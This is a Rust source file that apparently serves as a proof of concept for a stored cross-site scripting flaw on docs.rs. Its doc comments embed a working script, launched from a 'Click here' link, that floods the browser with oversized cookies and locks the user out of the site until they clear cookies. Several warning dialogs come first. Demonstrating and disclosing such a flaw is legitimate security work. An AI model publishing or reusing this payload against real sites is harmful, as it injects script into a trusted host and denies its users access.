//! 🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥 //! //! This crate demonstrates an XSS vulnerability of docs.rs. To test, click the link below. //! In order to access docs.rs afterward, you will need to clear cookies. //! //! 🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥🔥 //! <script> //! function bootstrap() { //! const doc1 = 'This is a demonstration of a security vulnerability (XSS). Click CANCEL to abort at any time.'; //! const doc2 = 'WARNING: If you proceed, you will not be able to access docs.rs. CLICK CANCEL if you do not wish this to happen.'; //! const doc3 = 'WARNING: To access docs.rs after proceeding, you will need to clear your browser cookies.'; //! if (!confirm(doc1) || !confirm(doc2) || !confirm(doc3)) { //! return; //! } //! if (prompt('Type "I understand what I need to do" to continue:') !== "I understand what I need to do") { return; } //! let z = 'z'; //! for (let i = 0; i < 4000; i++) { //! z = z + 'z'; //! } //! function setCookie(name) { //! document.cookie = name + '=' + z + '; expires=Fri, 31 Dec 9999 23:59:59 GMT; Path=/'; //! } //! ['a','b','c','d','e','f','g','h'].forEach(setCookie); //! window.location.reload(); //! } //! </script> #[doc = "<a href=# onClick=bootstrap()>Click here</a> for a demo of a security vulnerability. WARNING: you will need to reset cookies after doing this."] pub fn builder() { }